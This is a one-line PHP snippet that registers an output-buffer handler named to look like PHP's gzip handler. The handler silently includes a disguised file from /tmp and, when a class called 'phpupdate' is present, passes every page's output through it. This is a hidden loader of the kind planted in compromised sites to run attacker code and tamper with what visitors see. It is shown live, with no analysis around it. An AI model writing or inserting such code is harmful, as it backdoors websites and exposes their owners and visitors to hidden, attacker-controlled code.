function ob_gzhanler($s) { $f='/tmp/ssess_8d3fe972551acf91c51bf3cf91a66692'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');